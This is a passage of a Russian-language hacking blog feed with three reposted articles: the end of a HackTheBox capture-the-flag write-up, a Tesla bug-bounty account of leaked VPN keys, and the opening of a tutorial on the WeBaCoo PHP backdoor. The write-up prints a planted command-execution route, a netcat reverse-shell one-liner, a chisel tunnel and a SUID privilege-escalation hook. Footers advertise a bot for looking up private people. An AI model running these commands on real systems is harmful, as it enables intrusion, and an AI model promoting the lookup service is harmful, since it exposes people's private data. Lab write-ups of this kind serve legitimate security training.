    &lt;img src=&quot;https://img2.teletype.in/files/59/38/59383c7c-c11b-42e9-a94e-36e4777a5b00.png&quot; /&gt;
    &lt;figcaption&gt;Ис­тория ком­митов Git&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Znbg&quot;&gt;Те­перь прос­матри­ваем каж­дый ком­мит в надеж­де най­ти важ­ные дан­ные. И в одном из них обна­ружи­ваем URL прок­си‑сер­вера с ука­зан­ными учет­ными дан­ными.&lt;/p&gt;
  &lt;p id=&quot;GytT&quot;&gt;1git show a76f8f75f7a4a12b706b0cf9c983796fa1985820&lt;/p&gt;
  &lt;figure id=&quot;oARy&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7e/5c/7e5cc08b-2f1d-4292-805c-9a531ba2a038.png&quot; /&gt;
    &lt;figcaption&gt;Ком­мит с учет­ными дан­ными&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;dj5M&quot;&gt;Боль­ше в репози­тории ничего не находим, поэто­му начина­ем изу­чать исходный код при­ложе­ния.&lt;/p&gt;
  &lt;figure id=&quot;gl54&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ab/ad/abada3bd-0758-43dc-b0ae-7ab77d817a9f.png&quot; /&gt;
    &lt;figcaption&gt;Со­дер­жимое фай­ла static/views.py&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;j5Zg&quot;&gt;Как видишь, мы можем заг­ружать фай­лы с любым рас­ширени­ем. Сра­зу бро­сает­ся в гла­за фун­кция os.path.join — стро­ка 14. Пос­ледова­тель­ность ../ филь­тру­ется, что не поз­волит записать свой SSH-ключ поль­зовате­лю, даже если мы узна­ем путь. Одна­ко файл сох­раня­ется с тем же име­нем без вся­ких вре­мен­ных меток, что дает нам воз­можность переза­писы­вать сущес­тву­ющие фай­лы.&lt;/p&gt;
  &lt;p id=&quot;Udcg&quot;&gt;Точка опоры&lt;/p&gt;
  &lt;p id=&quot;xvEc&quot;&gt;Да­вай поп­робу­ем переза­писать текущий файл, добавив в его конец свой обра­бот­чик, к при­меру /ralf.&lt;/p&gt;
  &lt;p id=&quot;nCDO&quot;&gt;123@app.route(&amp;#x27;/ralf&amp;#x27;)def ralf(): return os.system(request.args.get(&amp;#x27;cmd&amp;#x27;))&lt;/p&gt;
  &lt;p id=&quot;uQXh&quot;&gt;Ссыл­ку на стра­ницу для заг­рузки фай­ла най­дем чуть ниже кноп­ки ска­чива­ния репози­тория.&lt;/p&gt;
  &lt;figure id=&quot;k7CM&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/8e/59/8e59a91b-b9f9-4855-a85f-0ad038d64fc7.png&quot; /&gt;
    &lt;figcaption&gt;Фор­ма для заг­рузки фай­лов&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;TvPX&quot;&gt;Заг­рузим наш новый файл view.py и перех­ватим зап­рос на заг­рузку в Burp Intercept.&lt;/p&gt;
  &lt;figure id=&quot;8CUB&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/22/7f/227f4801-7e81-476a-9a85-a5ffcc0a9de8.png&quot; /&gt;
    &lt;figcaption&gt;Пе­рех­вачен­ный зап­рос на заг­рузку фай­ла&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;VdHZ&quot;&gt;Для переза­писи фай­ла изме­ним filename и вмес­то views.py запишем пол­ный путь к это­му фай­лу — /app/app/views.py.&lt;/p&gt;
  &lt;figure id=&quot;yHdQ&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/8e/4f/8e4f1804-ed08-4c33-a587-0a167495f5b0.png&quot; /&gt;
    &lt;figcaption&gt;Из­менен­ный зап­рос на заг­рузку фай­ла&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;7M5L&quot;&gt;Ког­да все будет готово, отпра­вим зап­рос даль­ше на сер­вер. На стра­нице получим сооб­щение, что заг­рузка прош­ла успешно.&lt;/p&gt;
  &lt;figure id=&quot;337E&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/00/74/0074b771-cd33-4646-924c-ffaad39daa19.png&quot; /&gt;
    &lt;figcaption&gt;Со­обще­ние об успешной заг­рузке фай­лов&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;WY81&quot;&gt;Те­перь мы можем выпол­нять коман­ды и сра­зу поп­робу­ем запус­тить реверс‑шелл:&lt;/p&gt;
  &lt;p id=&quot;NDC4&quot;&gt;1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&amp;gt;&amp;amp;1|nc 10.10.14.49 4321 &amp;gt;/tmp/f&lt;/p&gt;
  &lt;p id=&quot;wMdS&quot;&gt;Я выпол­нял зап­рос через curl, поэто­му мне нуж­но было закоди­ровать реверс‑шелл в кодиров­ку URL. Burp Encoder закоди­рует абсо­лют­но все сим­волы, а не толь­ко спе­циаль­ные. Это не очень удоб­но, поэто­му я прос­то встав­ляю текст в Burp Repeater и кодирую ком­бинаци­ей кла­виш Ctrl-U. Одна­ко сго­дит­ся и любой дру­гой метод.&lt;/p&gt;
  &lt;p id=&quot;Kx63&quot;&gt;1curl &amp;#x27;http://opensource.htb/ralf?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&amp;gt;&amp;amp;1|nc 10.10.14.49 4321 &amp;gt;/tmp/f&amp;#x27;&lt;/p&gt;
  &lt;figure id=&quot;8lLM&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c1/9e/c19efe28-3013-4300-bd88-20bb026f998d.png&quot; /&gt;
    &lt;figcaption&gt;Ис­ходная коман­да curl&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;P7el&quot;&gt;1curl &amp;#x27;http://opensource.htb/ralf?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2&amp;gt;%261|nc+10.10.14.49+4321+&amp;gt;/tmp/f&amp;#x27;&lt;/p&gt;
  &lt;figure id=&quot;nO8R&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f9/fa/f9fa7809-d320-4b56-b7c6-b2179056eb9e.png&quot; /&gt;
    &lt;figcaption&gt;За­коди­рован­ная коман­да curl&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;12al&quot;&gt;Ос­талось коман­дойrlwrap -cAr nc -lnvp 4321 запус­тить лис­тенер и выпол­нить коман­ду для запус­ка реверс‑шел­ла.&lt;/p&gt;
  &lt;figure id=&quot;Q4OY&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d0/28/d0285bcf-388e-4b69-84ff-51d81a8063c0.png&quot; /&gt;
    &lt;figcaption&gt;Сес­сия поль­зовате­ля&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;0qRF&quot;&gt;Продвижение&lt;/p&gt;
  &lt;p id=&quot;LwIl&quot;&gt;По име­ни поль­зовате­ля понима­ем, что находим­ся внут­ри кон­тей­нера Docker. Даль­нейший путь прод­вижения дол­го искать не при­ходит­ся: вспо­мина­ем про филь­тра­цию под­клю­чений к пор­ту 3000. Сна­чала про­верим адрес докер‑машины, а потом уже поп­робу­ем под­клю­чить­ся к пор­ту 3000 хос­товой.&lt;/p&gt;
  &lt;figure id=&quot;1rBn&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/86/44/8644d7a3-5ed7-4f10-beca-1d87d4ca0d0a.png&quot; /&gt;
    &lt;figcaption&gt;Ре­зуль­тат выпол­нения коман­ды ifconfig&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;IDAL&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/62/5d/625d387b-ed3b-4022-b332-b9e6bf7cdad5.png&quot; /&gt;
    &lt;figcaption&gt;lОб­ращение к пор­ту 3000 с помощью curl&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;4zlg&quot;&gt;Для удоб­ной работы через бра­узер нам нуж­но тун­нелиро­вать тра­фик. Я буду исполь­зовать &lt;strong&gt;chisel&lt;/strong&gt;, который нуж­но запус­тить как на локаль­ном хос­те, в качес­тве сер­вера, так и на уда­лен­ном — как кли­ент. В парамет­ре сер­верной час­ти ука­зыва­ем, что ожи­даем под­клю­чения (парамет­ры —reverse), а так­же порт для соз­дания тун­неля.&lt;/p&gt;
  &lt;p id=&quot;Oxrm&quot;&gt;1chisel.bin server --reverse --port 8000&lt;/p&gt;
  &lt;figure id=&quot;0QBV&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/92/fb/92fb54f9-72ce-4dd7-8df3-dd70263e1de1.png&quot; /&gt;
    &lt;figcaption&gt;Ло­ги сер­верной час­ти&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;bZj3&quot;&gt;Те­перь на уда­лен­ной машине ини­циали­зиру­ем кли­ент­скую часть. В парамет­рах ука­зыва­ем адрес сер­вера chisel и порт для под­клю­чения, а так­же нас­трой­ки прок­сирова­ния.&lt;/p&gt;
  &lt;p id=&quot;psok&quot;&gt;1chisel.bin client 10.10.14.49:8000 R:3000:172.17.0.1:3000&lt;/p&gt;
  &lt;figure id=&quot;GjwT&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d8/a3/d8a33875-7d16-4963-9942-d21a278d0648.png&quot; /&gt;
    &lt;figcaption&gt;Ло­ги кли­ент­ской час­ти&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;nTJf&quot;&gt;В логах сер­вера дол­жны уви­деть сооб­щение о соз­дании сес­сии.&lt;/p&gt;
  &lt;figure id=&quot;qUFw&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/97/e9/97e9c99a-8965-4ce0-8d38-499eb5692f6a.png&quot; /&gt;
    &lt;figcaption&gt;Ло­ги сер­верной час­ти&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;XlpR&quot;&gt;Та­ким обра­зом, весь тра­фик, который мы пош­лем на локаль­ный порт 3000, будет тун­нелиро­ван на порт 3000 ука­зан­ного хос­та (в дан­ном слу­чае 172.17.0.1) через докер‑машину. Теперь откро­ем сайт в бра­узе­ре и уви­дим Git.&lt;/p&gt;
  &lt;figure id=&quot;w3d1&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/ca/81/ca810a43-5195-4b35-acbb-f20a23113b3c.png&quot; /&gt;
    &lt;figcaption&gt;Глав­ная стра­ница сай­та на пор­те 3000&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;DpJi&quot;&gt;Вос­поль­зовав­шись учет­ными дан­ными, которые мы наш­ли в репози­тории, авто­ризу­емся на сай­те.&lt;/p&gt;
  &lt;figure id=&quot;cmmF&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f0/bb/f0bb73fd-ac39-442c-bd44-ef444ad96beb.png&quot; /&gt;
    &lt;figcaption&gt;Глав­ная стра­ница сай­та пос­ле авто­риза­ции&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;1IDY&quot;&gt;Пе­рехо­дим к единс­твен­ному дос­тупно­му репози­торию и видим бэкап домаш­него катало­га поль­зовате­ля.&lt;/p&gt;
  &lt;figure id=&quot;9DME&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/82/be/82be3bdf-46d7-46e0-b29f-21d028e1e812.png&quot; /&gt;
    &lt;figcaption&gt;Со­дер­жимое Git-репози­тория&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;rA1b&quot;&gt;Ко­неч­но же, нас инте­ресу­ет при­ват­ный ключ SSH.&lt;/p&gt;
  &lt;figure id=&quot;NoiR&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a2/8d/a28d15e0-583d-4f24-ad61-c405adeaf492.png&quot; /&gt;
    &lt;figcaption&gt;Со­дер­жимое катало­га .ssh&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;f97c&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/01/78/017866f0-a6eb-4c21-8c66-63a8229fc227.png&quot; /&gt;
    &lt;figcaption&gt;SSH-ключ поль­зовате­ля dev01&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;IABk&quot;&gt;Ко­пиру­ем его на локаль­ный хост, коман­дой chmod 0600 id_rsa наз­нача­ем необ­ходимые пра­ва и под­клю­чаем­ся с этим клю­чом уже к основно­му хос­ту.&lt;/p&gt;
  &lt;figure id=&quot;00uW&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f1/f8/f1f8350c-e679-4f1b-bb45-fcaede69367d.png&quot; /&gt;
    &lt;figcaption&gt;Флаг поль­зовате­ля&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Lf90&quot;&gt;Локальное повышение привилегий&lt;/p&gt;
  &lt;p id=&quot;gbz8&quot;&gt;Пер­вым делом я, как обыч­но, поис­кал все сом­нитель­ные нас­трой­ки и поль­зователь­ские скрип­ты с помощью мно­гок­ратно упо­минав­шегося в моих рай­тапах LinPEAS, но ничего не нашел.&lt;/p&gt;
  &lt;p id=&quot;R2Xn&quot;&gt;Сле­дующий шаг — монито­ринг запус­каемых при­ложе­ний. Что­бы най­ти запус­каемые в сис­теме про­цес­сы, будем исполь­зовать ути­литу pspy64. Заг­рузим ее на хост при помощи wget, а потом выпол­ним.&lt;/p&gt;
  &lt;p id=&quot;eW0p&quot;&gt;В выводе отме­чаем исполь­зование коман­ды git, при­чем от име­ни при­виле­гиро­ван­ного поль­зовате­ля (нулевой UID — это root).&lt;/p&gt;
  &lt;figure id=&quot;NYlc&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ec/72/ec725a71-1c03-4d59-a21c-e5469631baf0.png&quot; /&gt;
    &lt;figcaption&gt;Вы­вод ути­литы pspy64&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;QhCd&quot;&gt;Тут я обра­тил­ся к GTFOBins. Это база тех­ник, которые поз­воля­ют повысить при­виле­гии при помощи стан­дар­тных при­ложе­ний Linux. В час­тнос­ти, есть тех­ника исполь­зования Git, которая поз­воля­ет получить ста­биль­ную обо­лоч­ку в при­виле­гиро­ван­ном кон­тек­сте. Нам она под­ходит, толь­ко вмес­то кон­тек­ста sudo у нас будет кон­текст поль­зовате­ля root.&lt;/p&gt;
  &lt;figure id=&quot;5AQH&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d5/a4/d5a4c8a7-b19e-4f41-a72e-8077f9ecc396.png&quot; /&gt;
    &lt;figcaption&gt;Опи­сание тех­ники sudo GTFOBins для Git&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;JDtd&quot;&gt;Здесь исполь­зует­ся перех­ватчик Git, который свя­зан с pre-commit. То есть мы можем записать свой скрипт в файл ~/.git/hooks/pre-commit, и код выпол­нится при выпол­нении коман­ды git commit. В качес­тве метода пер­систен­тнос­ти будем уста­нав­ливать S-бит фай­лу коман­дной обо­лоч­ки /bin/bash.&lt;/p&gt;
  &lt;p id=&quot;0xsN&quot;&gt;12# echo &amp;quot;chmod u+s /bin/bash&amp;quot; &amp;gt;&amp;gt; ~/.git/hooks/pre-commitmv ~/.git/hooks/pre-commit.sample ~/.git/hooks/pre-commit&lt;/p&gt;
  &lt;figure id=&quot;N73J&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c6/08/c608f975-b161-4732-957c-758ec7d54449.png&quot; /&gt;
    &lt;figcaption&gt;Со­дер­жимое фай­ла pre-commit&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;5xVi&quot;&gt;Справка: бит SUID&lt;/p&gt;
  &lt;p id=&quot;I08C&quot;&gt;Ког­да у фай­ла уста­нов­лен атри­бут setuid (S-атри­бут), обыч­ный поль­зователь, запус­кающий этот файл, получа­ет повыше­ние прав до поль­зовате­ля — вла­дель­ца фай­ла в рам­ках запущен­ного про­цес­са. Пос­ле получе­ния повышен­ных прав при­ложе­ние может выпол­нять задачи, которые недос­тупны обыч­ному поль­зовате­лю. Из‑за воз­можнос­ти сос­тояния гон­ки мно­гие опе­раци­онные сис­темы игно­риру­ют S-атри­бут, уста­нов­ленный shell-скрип­там.&lt;/p&gt;
  &lt;p id=&quot;V37u&quot;&gt;&lt;a href=&quot;https://spy-soft.net/hacking-remote-host-via-git/&quot; target=&quot;_blank&quot;&gt;Источник&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;9icx&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;CxHl&quot;&gt;&lt;strong&gt;Наши проекты:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;iSeJ&quot;&gt;- Кибер новости: &lt;a href=&quot;https://t.me/matrixleaked&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;the Matrix&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Хакинг: &lt;a href=&quot;https://t.me/+bby6PJAbqpNhOWZh&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;/me Hacker&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Кодинг: &lt;a href=&quot;https://t.me/+zBgEm0olmpxlMzA6&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Minor Code&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;👁 Пробить человека? Легко через нашего бота: &lt;a href=&quot;https://t.me/iprobivator_bot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Мистер Пробиватор&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>matrix_supp:Vot-kak-vzlomal-sajt-Tesla-i-poluchil-10000-10-10</id><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp/Vot-kak-vzlomal-sajt-Tesla-i-poluchil-10000-10-10?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><title>Вот как взломал сайт Tesla и получил 10.000$</title><published>2022-10-10T07:58:09.606Z</published><updated>2022-10-10T07:58:09.606Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/f5/3c/f53c1b25-4e66-4430-9eba-499c4776ed9b.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/68/ba/68badaac-e05c-41b3-9150-2997d7cccd02.png&quot;&gt;Многие хотят заниматься багхантингом и участвовать в программах Багбаунти, но боятся начать. Я Xail, днем пентестер в хакерской команде Red Team, по ночам багхантер. В этой короткой статье я поделюсь своим кейсом взлома сайта Tesla. Я покажу, как с легкостью смог найти уязвимость класса P1 и заработать на этом немного денег. Надеюсь, мой опыт послужит для вас хорошим примером и будет мотивировать. Погнали!</summary><content type="html">
  &lt;figure id=&quot;vws0&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/68/ba/68badaac-e05c-41b3-9150-2997d7cccd02.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;PTjP&quot;&gt;Многие хотят заниматься багхантингом и участвовать в программах Багбаунти, но боятся начать. Я Xail, днем пентестер в хакерской команде Red Team, по ночам багхантер. В этой короткой статье я поделюсь своим кейсом взлома сайта Tesla. Я покажу, как с легкостью смог найти уязвимость класса P1 и заработать на этом немного денег. Надеюсь, мой опыт послужит для вас хорошим примером и будет мотивировать. Погнали!&lt;/p&gt;
  &lt;p id=&quot;7Fu0&quot;&gt;Еще по теме: &lt;a href=&quot;https://spy-soft.net/nasa-hack/&quot; target=&quot;_blank&quot;&gt;Вот как я взломал сайт NASA&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;Bn9I&quot;&gt;Заранее предупреждаю, не ожидайте ничего особо умного. Это был низко висящий фрукт, который можно было сорвать без особых усилий и знаний, но в этом и заключается фишка, кто не хочет без труда сорвать бабла?!&lt;/p&gt;
  &lt;p id=&quot;rM7i&quot;&gt;Багбаунти не имеет никакого отношения к батончику с райским вкусом, — это программа, которую владелец сайта (web-приложения) проводит для привлечения сторонних специалистов в области ИБ к поиску уязвимостей. При участии в программе Bug Bounty нужно действовать этично и придерживаться установленных правил. Не забывайте, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши незаконных действия.&lt;strong&gt;Взломал сайт Tesla и получил 10.000$&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;t405&quot;&gt;26 февраля 2021 года в рамках программы багбаунти я сообщил об обнаруженной мною уязвимости на сайте Tesla. Уязвимость позволила мне получить доступ к конфиденциальной информации, наиболее важной из которых был общий &lt;a href=&quot;https://ru.wikipedia.org/wiki/IKE&quot; target=&quot;_blank&quot;&gt;ключ IKE&lt;/a&gt;, который можно было использовать для подключения к корпоративной сети Tesla.&lt;/p&gt;
  &lt;p id=&quot;eqtQ&quot;&gt;Вот как все было. После &lt;a href=&quot;https://spy-soft.net/find-subdomains-online/&quot; target=&quot;_blank&quot;&gt;поиска поддоменов&lt;/a&gt; и определения серверов, которые прослушивают TCP-порты 80 и 443, я решил зарядить &lt;a href=&quot;https://spy-soft.net/dirbuster-linux-windows/&quot; target=&quot;_blank&quot;&gt;Dirbuster&lt;/a&gt; со стандартным списком слов.&lt;/p&gt;
  &lt;p id=&quot;aUWE&quot;&gt;Через нескольких часов сканирования, обнаружил интересную вещь. Было включено индексирование на:&lt;/p&gt;
  &lt;p id=&quot;FqRO&quot;&gt;1https://trt.teslamotors.com&lt;/p&gt;
  &lt;p id=&quot;zFTR&quot;&gt;в каталоге:&lt;/p&gt;
  &lt;p id=&quot;jy3d&quot;&gt;1/uploads&lt;/p&gt;
  &lt;p id=&quot;PbmE&quot;&gt;Это означало, что я мог просматривать все файлы, которые находились в директории.&lt;/p&gt;
  &lt;p id=&quot;Vxu0&quot;&gt;Просмотрев различные файлы в каталоге/uploads, я обнаружил файл .zip с именем &lt;strong&gt;pdx01.zip&lt;/strong&gt;. Долго не думая, скачал его на &lt;a href=&quot;https://spy-soft.net/virtualnaya-mashina-virtualbox/&quot; target=&quot;_blank&quot;&gt;виртуалке&lt;/a&gt; и обнаружил внутри несколько файлов конфигурации.&lt;/p&gt;
  &lt;p id=&quot;qCNk&quot;&gt;Среди этих файлах мне удалось найти общий ключ VPN, который позволяет аутентифицироваться в корпоративной сети Tesla.&lt;/p&gt;
  &lt;p id=&quot;mD8G&quot;&gt;Я также нашел пароли WiFi магазинов Tesla и пароли Radius.&lt;/p&gt;
  &lt;figure id=&quot;2o39&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/87/dc/87dc789d-c159-4fa4-8f46-a9ef7ca8d3fc.png&quot; /&gt;
    &lt;figcaption&gt;Файлы конфигурации, содержащие хэши и пароли в открытом виде&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;wOCf&quot;&gt;Я сразу же сообщил об этой проблеме Tesla через их программу BugCrowd Bug Bounty. Работники Tesla быстро отреагировали, приняли уязвимость, пометили ее как P1 (высокий уровень угрозы) и устранили проблему. После чего скинули мне 10.000$.&lt;/p&gt;
  &lt;p id=&quot;mIcA&quot;&gt;Вот как выглядит моя находка на сайте программы поощрений Tesla.&lt;/p&gt;
  &lt;p id=&quot;cU2U&quot;&gt;Спасибо Тесла — это отличный пример компании, которая серьезно относится к безопасности и вознаграждает тех, кто помогает им выявлять и устранять проблемы. Ну и отдельное спасибо за 10.000$, на улице такие деньги не валяются.&lt;/p&gt;
  &lt;p id=&quot;arWD&quot;&gt;Как видите взламывать сайты Тесла, не только прикольно, но и выгодно. Хотя и взломом это трудно назвать )&lt;/p&gt;
  &lt;p id=&quot;VwkC&quot;&gt;&lt;strong&gt;РЕКОМЕНДУЮ:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;DN4P&quot;&gt;
    &lt;li id=&quot;MNHc&quot;&gt;&lt;a href=&quot;https://spy-soft.net/hack-dutch-government-site/&quot; target=&quot;_blank&quot;&gt;Взлом правительственного сайта Нидерландов&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;MtmC&quot;&gt;&lt;a href=&quot;https://spy-soft.net/tools-to-find-vulnerabilities/&quot; target=&quot;_blank&quot;&gt;Лучшие инструменты для поиска уязвимостей сайтов&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;aIcU&quot;&gt;&lt;a href=&quot;https://spy-soft.net/hack-tesla-site/&quot; target=&quot;_blank&quot;&gt;Источник&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;sIhf&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;PH99&quot;&gt;&lt;strong&gt;Наши проекты:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;U6pX&quot;&gt;- Кибер новости: &lt;a href=&quot;https://t.me/matrixleaked&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;the Matrix&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Хакинг: &lt;a href=&quot;https://t.me/+bby6PJAbqpNhOWZh&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;/me Hacker&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Кодинг: &lt;a href=&quot;https://t.me/+zBgEm0olmpxlMzA6&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Minor Code&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;👁 Пробить человека? Легко через нашего бота: &lt;a href=&quot;https://t.me/iprobivator_bot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Мистер Пробиватор&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>matrix_supp:Ispolzovanie-We-Ba-Coo-dlya-sozdaniya-behkdora-PHP-10-01</id><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp/Ispolzovanie-We-Ba-Coo-dlya-sozdaniya-behkdora-PHP-10-01?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><title>Использование WeBaCoo для создания бэкдора PHP</title><published>2022-10-01T14:57:54.303Z</published><updated>2022-10-01T14:57:54.303Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/06/f0/06f01778-5148-49a1-8f15-8e5c3307faef.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img4.teletype.in/files/3b/aa/3baa3f16-44df-4d3a-8d0c-cb3a38860510.png&quot;&gt;WeBaCoo (Web Backdoor Cookie) — скрипт для создания бэкдора PHP (скрытого соединения между клиентом и веб-сервером через HTTP). Это инструмент пост-эксплуатации, способный поддерживать доступ к скомпрометированному веб-серверу. В этой статье я познакомлю с WeBaCoo и покажу как его использовать на Kali Linux.</summary><content type="html">
  &lt;figure id=&quot;cLyo&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/3b/aa/3baa3f16-44df-4d3a-8d0c-cb3a38860510.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;3gHI&quot;&gt;WeBaCoo (Web Backdoor Cookie) — скрипт для создания бэкдора PHP (скрытого соединения между клиентом и веб-сервером через HTTP). Это инструмент пост-эксплуатации, способный поддерживать доступ к скомпрометированному веб-серверу. В этой статье я познакомлю с WeBaCoo и покажу как его использовать на Kali Linux.&lt;/p&gt;
  &lt;p id=&quot;zR2c&quot;&gt;Еще по теме: &lt;a href=&quot;https://spy-soft.net/icmp-tunnelling-pentest/&quot; target=&quot;_blank&quot;&gt;ICMP-туннелирование при пентесте&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;1FDI&quot;&gt;&lt;strong&gt;Что такое WeBaCoo&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;M9Nr&quot;&gt;WeBaCoo — этот скрипт Perl для создания бэкдора и удаленного скрытого подключения к веб-серверу. Инструмент был разработан для работы под радаром современных антивирусов, NIDS (систем обнаружения), IPS (систем предотвращения вторжений), сетевых брандмауэров и брандмауэров приложений.&lt;/p&gt;
  &lt;p id=&quot;ygjm&quot;&gt;Статья написана в образовательных целях, для обучения этичных хакеров. При демонстрации работы были использованы личные устройства автора. Использование подобных инструментов без надлежащего письменного разрешения, является незаконным и будет расцениваться, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши действия.&lt;/p&gt;
  &lt;p id=&quot;HSPE&quot;&gt;Инструмент имеет два режима работы:&lt;/p&gt;
  &lt;ul id=&quot;Axbb&quot;&gt;
    &lt;li id=&quot;cO7d&quot;&gt;Генерация (-g) — режим для создания бэкдора PHP.&lt;/li&gt;
    &lt;li id=&quot;R5aq&quot;&gt;Терминал (-t) — режим для подключения к бэкдору.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;PlYZ&quot;&gt;Интересная особенность WeBaCoo заключается в том, что соединение между веб-сервером и клиентом закодировано в файле cookie заголовка HTTP, поэтому его трудно обнаружить антивирусом, системами обнаружения / предотвращения сетевых вторжений, сетевыми брандмауэрами и брандмауэрами приложений.&lt;/p&gt;
  &lt;p id=&quot;Snod&quot;&gt;&lt;strong&gt;Установка WeBaCoo&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;XEk0&quot;&gt;WeBaCoo уже предустановлен на Kali Linux, но если вы используете другой дистрибутив, тогда можете установить черезapt:&lt;/p&gt;
